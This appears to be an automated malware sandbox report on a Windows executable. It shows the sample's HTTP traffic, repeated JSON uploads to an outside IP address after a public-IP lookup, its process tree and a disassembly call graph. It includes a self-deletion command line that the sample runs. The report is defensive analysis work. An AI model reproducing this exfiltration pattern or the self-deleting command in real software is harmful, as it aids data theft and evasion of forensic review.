                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:57.495294094 CEST245OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1006
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.628474951 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:57 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:57.630544901 CEST245OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1006
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.769421101 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:57 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:57.771349907 CEST245OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1005
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.903383017 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:57 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:57.904882908 CEST245OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1001
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:58.043065071 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:57 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:58.044924021 CEST245OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1002
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:58.174956083 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:58 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:25:00.379357100 CEST247OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 100842
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:25:01.263315916 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:25:01 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:25:02.593252897 CEST246OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 29428
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:25:02.843919992 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:25:02 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:25:05.109874010 CEST246OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 57241
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:25:05.286645889 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:25:05 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:25:07.037405968 CEST248OUTPOST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1270200
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:25:09.768264055 CEST280INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:25:09 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success


                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.11.2049788172.67.74.1524437132C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-05-04 22:24:48 UTC188OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Host: api.ipify.org
                                                                                                                                            2024-05-04 22:24:48 UTC211INHTTP/1.1 200 OK
                                                                                                                                            Date: Sat, 04 May 2024 22:24:48 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Content-Length: 12
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Origin
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 87ebe72dfc33395c-IAD
                                                                                                                                            2024-05-04 22:24:48 UTC12INData Raw: 31 35 34 2e 31 36 2e 34 39 2e 34 31
                                                                                                                                            Data Ascii: 154.16.49.41


                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:00:23:27
                                                                                                                                            Start date:05/05/2024
                                                                                                                                            Path:C:\Users\user\Desktop\app.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\app.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'290'240 bytes
                                                                                                                                            MD5 hash:75B9EF9142A78671D449C8D22AB6BE14
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:1
                                                                                                                                            Start time:00:23:27
                                                                                                                                            Start date:05/05/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7cb400000
                                                                                                                                            File size:875'008 bytes
                                                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:00:24:07
                                                                                                                                            Start date:05/05/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'290'240 bytes
                                                                                                                                            MD5 hash:75B9EF9142A78671D449C8D22AB6BE14
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 11%, ReversingLabs
                                                                                                                                            • Detection: 11%, Virustotal, Browse
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:4
                                                                                                                                            Start time:00:24:07
                                                                                                                                            Start date:05/05/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7cb400000
                                                                                                                                            File size:875'008 bytes
                                                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:00:25:08
                                                                                                                                            Start date:05/05/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
                                                                                                                                            Imagebase:0x90000
                                                                                                                                            File size:236'544 bytes
                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:00:25:08
                                                                                                                                            Start date:05/05/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7cb400000
                                                                                                                                            File size:875'008 bytes
                                                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:00:25:08
                                                                                                                                            Start date:05/05/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:timeout /t 5
                                                                                                                                            Imagebase:0xd40000
                                                                                                                                            File size:25'088 bytes
                                                                                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Disassembly

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:3.6%
                                                                                                                                              Dynamic/Decrypted Code Coverage:92%
                                                                                                                                              Signature Coverage:52.4%
                                                                                                                                              Total number of Nodes:1938
                                                                                                                                              Total number of Limit Nodes:41
                                                                                                                                              execution_graph 74666 25d201c 74667 25d202e 74666->74667 74668 25d2036 74666->74668 74695 25bee40 74667->74695 74674 25cb990 74668->74674 74671 25d203e 74683 25bf2a0 74671->74683 74673 25d205e 74675 25cb9c1 74674->74675 74676 25cb9e8 74675->74676 74704 25cba70 48 API calls 74675->74704 74676->74671 74678 25cb9e2 74678->74676 74681 25cba1b 74678->74681 74705 25cbb60 HeapFree HeapFree 74678->74705 74680 25cba5d 74680->74671 74681->74680 74706 25cbb60 HeapFree HeapFree 74681->74706 74707 25bf880 48 API calls 74683->74707 74685 25bf2e0 74686 25bf2e4 74685->74686 74708 25bf580 HeapFree HeapFree 74685->74708 74687 25bf2e9 74686->74687 74709 25bf050 HeapFree HeapFree 74686->74709 74687->74673 74690 25bf378 74710 25bf1b0 HeapFree HeapFree 74690->74710 74692 25bf386 74693 25bf3a7 74692->74693 74711 25bf580 HeapFree HeapFree 74692->74711 74693->74673 74696 25bee52 74695->74696 74697 25bee84 74696->74697 74712 25c1410 74696->74712 74697->74668 74699 25bee6c 74700 25bee7b 74699->74700 74701 25bee86 GetCurrentThread SetThreadDescription 74699->74701 74732 25c16e0 HeapFree HeapFree 74700->74732 74701->74697 74703 25bee9e HeapFree 74701->74703 74703->74697 74704->74678 74705->74681 74706->74680 74707->74685 74708->74686 74709->74690 74710->74692 74711->74693 74713 25c1450 74712->74713 74727 25c147e 74712->74727 74714 25c1691 74713->74714 74716 25c1466 74713->74716 74740 25610d0 48 API calls 74714->74740 74733 25cd430 74716->74733 74717 25c1696 74741 25ec900 48 API calls 74717->74741 74721 25c16a2 74724 25c16bd HeapFree 74721->74724 74725 25c16ce 74721->74725 74723 25c1620 74728 25c1661 74723->74728 74729 25c163a HeapFree 74723->74729 74724->74725 74725->74699 74726 25c164b 74726->74728 74739 25c1830 50 API calls 74726->74739 74731 25c15ba 74727->74731 74738 25f0bd0 50 API calls 74727->74738 74728->74699 74729->74728 74731->74723 74731->74726 74732->74697 74734 25cd44e RtlAllocateHeap 74733->74734 74735 25cd43f GetProcessHeap 74733->74735 74737 25c1476 74734->74737 74736 25cd449 74735->74736 74735->74737 74736->74734 74737->74717 74737->74727 74738->74727 74739->74728 74740->74717 74741->74721 74742 2583aba 74917 25be5f7 74742->74917 74744 2583ae1 74778 25853f7 74744->74778 74946 25d96a2 CoInitializeEx 74744->74946 74745 25cd2e0 55 API calls 74746 25844c0 74745->74746 74748 258632e CloseHandle 74746->74748 74892 2584759 74746->74892 74748->74892 74750 2583b1b 74753 2585414 74750->74753 74956 259aa16 74750->74956 74751 25844a0 75227 258008b 48 API calls 74751->75227 75257 25cd2e0 74753->75257 74768 2583b46 75185 25d814c 74768->75185 74771 2585552 74773 258555f 74771->74773 74771->74778 75262 258bab0 69 API calls 74773->75262 74775 2585306 74775->74771 74775->74773 74775->74778 74781 258551c HeapFree 74775->74781 74788 2586512 74775->74788 74776 258558b 74777 2585593 74776->74777 74780 25d814c 48 API calls 74776->74780 74783 2586097 74777->74783 75263 258172d HeapFree HeapFree HeapFree HeapFree HeapFree 74777->75263 74778->74745 74779 2583bdc 75195 25617d0 74779->75195 74780->74777 74781->74775 74786 25860bb 74783->74786 74787 25860a7 HeapFree 74783->74787 74784 2583ff6 74789 2584001 HeapFree 74784->74789 74795 2584018 74784->74795 74790 25860d8 74786->74790 74791 25860c4 HeapFree 74786->74791 74787->74786 75265 25c1a40 74788->75265 74789->74795 75264 257b620 HeapFree HeapFree HeapFree 74790->75264 74791->74790 74795->74795 75206 25c68a0 74795->75206 74796 25860e3 74796->74746 74801 25860f7 HeapFree 74796->74801 74797 25623c0 48 API calls 74798 258653f 74797->74798 74799 25623c0 48 API calls 74798->74799 74802 258654e 74799->74802 74801->74746 74804 25623c0 48 API calls 74802->74804 74806 258655f 74804->74806 74805 25840ac 75209 25623c0 74805->75209 74807 25d814c 48 API calls 74808 2584146 74807->74808 74808->74805 74809 258416f HeapFree 74808->74809 74809->74805 74811 2584198 74812 258419c HeapFree 74811->74812 74813 25841ae 74811->74813 74812->74813 75219 25d85f4 74813->75219 74816 258447c GetLastError 75226 25800bf 48 API calls 74816->75226 74818 2584491 74821 258487b HeapFree 74818->74821 74908 2584742 74818->74908 74819 2584339 75225 257b090 51 API calls 74819->75225 74821->74908 74822 258434e 74822->74753 74823 2584361 74822->74823 74824 25d85f4 50 API calls 74823->74824 74825 25843b7 74824->74825 74828 25844cc GetLastError 74825->74828 74831 25843e6 74825->74831 74827 25848f1 HeapFree 74827->74908 75228 25800bf 48 API calls 74828->75228 74834 25d85f4 50 API calls 74831->74834 74832 258493e HeapFree 74832->74908 74833 25844ed 74835 2584853 HeapFree 74833->74835 74836 2584865 74833->74836 74837 2584415 74834->74837 74835->74836 75233 257b620 HeapFree HeapFree HeapFree 74836->75233 74839 25d85f4 50 API calls 74837->74839 74843 258443e 74839->74843 74840 25c68a0 65 API calls 74840->74908 74841 2584765 GetLastError 75231 25800bf 48 API calls 74841->75231 74843->74841 74852 258453e 74843->74852 74845 2584798 74846 2584821 HeapFree 74845->74846 74847 2584833 74845->74847 74846->74847 74847->74833 74849 258483a HeapFree 74847->74849 74848 2584a6d HeapFree 74848->74908 74849->74833 74850 2584a9c HeapFree 74850->74908 74851 2584acf HeapFree 74851->74908 74853 25845c5 74852->74853 74858 25847a4 GetLastError 74852->74858 74854 25d814c 48 API calls 74853->74854 74856 25845d6 74854->74856 74855 2584afc HeapFree 74855->74908 74861 2584615 74856->74861 74873 2585374 GetLastError 74856->74873 75232 25800bf 48 API calls 74858->75232 75229 2561570 49 API calls 74861->75229 74863 2584b3a HeapFree 74863->74908 74864 2584621 74866 25d814c 48 API calls 74864->74866 74865 25a2af0 72 API calls 74865->74908 74874 2584633 74866->74874 74869 2584b7a HeapFree 74869->74908 74870 25853b9 74870->74845 74872 25853c9 HeapFree 74870->74872 74872->74778 74872->74845 75256 25800bf 48 API calls 74873->75256 74876 258465f HeapFree 74874->74876 74883 2584671 74874->74883 74876->74883 74877 25846cc 74880 25846d3 HeapFree 74877->74880 74881 25846e5 74877->74881 74878 25846b7 HeapFree 74878->74877 74879 2584bd9 HeapFree 74879->74908 74880->74881 74884 25846ec HeapFree 74881->74884 74885 25846fe 74881->74885 74883->74877 74883->74878 74884->74885 74886 2584705 HeapFree 74885->74886 74887 2584717 74885->74887 74886->74887 75230 257b620 HeapFree HeapFree HeapFree 74887->75230 74889 2584c16 HeapFree 74889->74908 74890 2584723 74891 258472d HeapFree 74890->74891 74890->74908 74891->74908 74893 25d814c 48 API calls 74893->74908 74894 25623c0 48 API calls 74894->74908 74895 2584d49 HeapFree 74895->74908 74896 2584d78 HeapFree 74896->74908 74897 2584dab HeapFree 74897->74908 74899 2584dd8 HeapFree 74899->74908 74902 2584ee1 HeapFree 74902->74908 74903 2584ea9 HeapFree 74903->74908 74904 2584f4e HeapFree 74904->74908 74905 2584f66 HeapFree 74905->74908 74907 25617d0 49 API calls 74907->74908 74908->74827 74908->74832 74908->74840 74908->74848 74908->74850 74908->74851 74908->74855 74908->74863 74908->74865 74908->74869 74908->74879 74908->74889 74908->74892 74908->74893 74908->74894 74908->74895 74908->74896 74908->74897 74908->74899 74908->74902 74908->74903 74908->74904 74908->74905 74908->74907 74909 25850fb 74908->74909 74911 258512c 74908->74911 75234 257b669 HeapFree HeapFree 74908->75234 75235 25a48dc 53 API calls 74908->75235 75236 25cc1e0 54 API calls 74908->75236 75237 25a4960 53 API calls 74908->75237 75238 25a49e6 50 API calls 74908->75238 75239 25a4a88 76 API calls 74908->75239 75240 25a4544 62 API calls 74908->75240 75241 25cc4e0 54 API calls 74908->75241 75242 258222c HeapFree 74908->75242 74910 2585104 HeapFree 74909->74910 74909->74911 74910->74911 74911->74778 75243 257fb56 HeapFree HeapFree HeapFree HeapFree 74911->75243 74913 25851bd 74913->74913 74914 25d814c 48 API calls 74913->74914 74915 258529f 74914->74915 75244 25966ee 74915->75244 74918 25be60f 74917->74918 74919 25cd430 2 API calls 74918->74919 74921 25be656 74918->74921 74920 25be6de 74919->74920 74922 25be9df 74920->74922 74931 25be6e6 74920->74931 74930 25be8b4 74921->74930 75278 256ea05 50 API calls 74921->75278 75280 25ec900 48 API calls 74922->75280 74924 25be9eb GetModuleHandleA 74925 25bea01 GetProcAddress 74924->74925 74926 25bea25 74924->74926 74925->74926 74928 25bea13 GetProcAddress 74925->74928 74926->74744 74928->74926 74932 25be92c 74930->74932 74934 25be950 HeapFree 74930->74934 74935 25be905 HeapReAlloc 74930->74935 74933 25be866 74931->74933 75276 25f1823 50 API calls 74931->75276 74936 25be966 CreateMutexW GetLastError 74932->74936 74937 25be93c 74932->74937 74933->74921 74933->74932 74941 25be89b 74933->74941 74934->74936 74935->74936 74940 25be920 74935->74940 74938 25be97c 74936->74938 74939 25be981 74936->74939 74937->74744 74938->74939 74943 25be997 CloseHandle 74938->74943 74939->74937 74944 25be9c8 HeapFree 74939->74944 75279 25ec900 48 API calls 74940->75279 74941->74930 75277 256ea05 50 API calls 74941->75277 74943->74939 74944->74937 74947 25d972e 74946->74947 74948 25d96c5 CoInitializeSecurity 74946->74948 75283 25d8b49 8 API calls 74947->75283 74950 2583b0e 74948->74950 74951 25d96f1 74948->74951 74950->74750 74950->74751 75281 25d8b49 8 API calls 74951->75281 74953 25d96f8 74954 25d9735 74953->74954 75282 25d95b0 HeapFree 74953->75282 74954->74950 75284 25d9760 CoCreateInstance 74956->75284 74959 259ac6c 75740 25d95b0 HeapFree 74959->75740 74961 259aa49 74961->74961 75303 2581c36 74961->75303 74963 259ac78 74968 25d814c 48 API calls 74963->74968 74965 259ac7d 75741 25d95b0 HeapFree 74965->75741 74966 259ac66 75330 259920c 74966->75330 74973 259b56a 74968->74973 74970 259acb5 74987 25d814c 48 API calls 74970->74987 74971 259ab14 74971->74966 74982 25623c0 48 API calls 74971->74982 75738 25837b6 50 API calls 74971->75738 75739 25726a3 HeapFree HeapFree 74971->75739 74975 259b6bd 74973->74975 74980 259b5c0 74973->74980 75342 25967dd 74973->75342 74976 259b6c4 HeapFree 74975->74976 74977 259b6d6 74975->74977 74976->74977 75351 259bd08 74977->75351 74978 25617d0 49 API calls 74978->74980 74980->74973 74980->74978 74981 25d85f4 50 API calls 74980->74981 74988 259b684 HeapFree 74980->74988 74992 259b69b 74980->74992 74983 259b65b GetModuleHandleW 74981->74983 74982->74971 74983->74980 74984 259b66f HeapFree 74983->74984 74984->74980 74986 259b6db 74989 259b6fe 74986->74989 74990 259bac1 74986->74990 74998 259b711 74986->74998 74991 259ad56 74987->74991 74988->74980 75749 2596aa8 HeapFree HeapFree 74989->75749 75751 25cc8b0 74990->75751 74996 25966ee 50 API calls 74991->74996 74995 259b6a6 HeapFree 74992->74995 74992->74998 74995->74998 74997 259ad9e 74996->74997 75000 25d814c 48 API calls 74997->75000 75001 259b90a 74998->75001 75012 2583b37 74998->75012 75750 25aa869 50 API calls 74998->75750 75003 259ade4 75000->75003 75007 259b93f 75001->75007 75008 259b930 HeapFree 75001->75008 75006 259ae04 75003->75006 75742 25837b6 50 API calls 75003->75742 75014 25d814c 48 API calls 75006->75014 75011 25617d0 49 API calls 75007->75011 75008->75007 75013 259b9ab 75011->75013 75083 258a578 75012->75083 75015 25617d0 49 API calls 75013->75015 75016 259ae7f 75014->75016 75017 259b9d9 75015->75017 75018 259aea6 75016->75018 75743 25837b6 50 API calls 75016->75743 75019 25d85f4 50 API calls 75017->75019 75025 25d814c 48 API calls 75018->75025 75020 259ba03 75019->75020 75022 25d85f4 50 API calls 75020->75022 75026 259ba35 MessageBoxW 75022->75026 75028 259af12 75025->75028 75029 259ba4d HeapFree 75026->75029 75030 259ba5c 75026->75030 75032 259af31 75028->75032 75744 25837b6 50 API calls 75028->75744 75029->75030 75034 259ba63 HeapFree 75030->75034 75035 259ba75 75030->75035 75031 259bd01 75033 25cd2e0 55 API calls 75031->75033 75038 25d814c 48 API calls 75032->75038 75034->75035 75035->75031 75037 259ba87 75035->75037 75039 259ba8e HeapFree 75037->75039 75040 259baa0 75037->75040 75043 259afac 75038->75043 75039->75040 75040->75012 75044 259baa7 HeapFree 75040->75044 75045 259afd3 75043->75045 75745 25837b6 50 API calls 75043->75745 75044->75012 75047 25d814c 48 API calls 75045->75047 75048 259b04e 75047->75048 75049 259b075 75048->75049 75746 25837b6 50 API calls 75048->75746 75051 25d814c 48 API calls 75049->75051 75052 259b0dd 75051->75052 75054 259b0f9 75052->75054 75747 25837b6 50 API calls 75052->75747 75054->75054 75055 25d814c 48 API calls 75054->75055 75056 259b1d9 75055->75056 75079 259b209 75056->75079 75748 25837b6 50 API calls 75056->75748 75058 259b44e 75336 25991b0 75058->75336 75060 259b46d 75064 259b47d HeapFree 75060->75064 75065 259b48c 75060->75065 75061 259b41f 75062 259b739 75061->75062 75063 259b728 HeapFree 75061->75063 75066 25991b0 2 API calls 75062->75066 75063->75062 75064->75065 75067 259b49a HeapFree 75065->75067 75068 259b4ac 75065->75068 75069 259b745 75066->75069 75067->75068 75068->74963 75070 259b4b3 HeapFree 75068->75070 75071 259b75b HeapFree 75069->75071 75072 259b76a 75069->75072 75070->74963 75071->75072 75074 259b771 HeapFree 75072->75074 75075 259b783 75072->75075 75073 259b42b HeapFree 75073->75079 75074->75075 75075->74998 75076 259b78a HeapFree 75075->75076 75076->74998 75077 25617d0 49 API calls 75077->75079 75078 2561b50 49 API calls 75078->75079 75079->75058 75079->75061 75079->75073 75079->75077 